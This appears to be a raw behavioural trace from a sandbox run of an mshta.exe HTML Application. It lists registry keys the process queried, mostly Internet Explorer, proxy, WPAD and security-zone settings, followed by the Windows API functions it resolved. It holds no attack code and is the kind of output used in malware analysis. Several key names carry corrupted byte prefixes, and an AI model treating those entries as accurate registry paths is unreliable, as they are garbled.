HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x5f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x7f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x6018iEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
\x6018iEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
linkinfo.dll.IsValidLinkInfo
propsys.dll.#407
propsys.dll.PropVariantToGUID
propsys.dll.PSGetNameFromPropertyKey
propsys.dll.PSStringFromPropertyKey
propsys.dll.InitVariantFromBuffer
oleaut32.dll.#9
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
oleaut32.dll.#6
propsys.dll.PropVariantToStringAlloc
ole32.dll.CoTaskMemRealloc
ole32.dll.CLSIDFromString
comctl32.dll.#388
comctl32.dll.#321
shell32.dll.#66
ole32.dll.CoGetMalloc
ole32.dll.CoAllowSetForegroundWindow
ole32.dll.CoCreateInstance
secur32.dll.GetUserNameExW
api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW
shell32.dll.SHGetFolderPathW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSidToSidW
advapi32.dll.SaferGetPolicyInformation
sfc.dll.SfcIsFileProtected
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
cryptsp.dll.CryptReleaseContext
kernelbase.dll.SetThreadStackGuarantee
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
oleaut32.dll.#500
cryptbase.dll.SystemFunction036
kernel32.dll.HeapSetInformation
kernel32.dll.RegisterApplicationRestart
mshtml.dll.RunHTMLApplication
ole32.dll.OleInitialize
shlwapi.dll.PathRemoveArgsW
urlmon.dll.CreateURLMonikerEx
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_QueryService
shlwapi.dll.#29
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
oleaut32.dll.#4
oleaut32.dll.#7
urlmon.dll.#485
shell32.dll.SHCreateAssociationRegistration
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
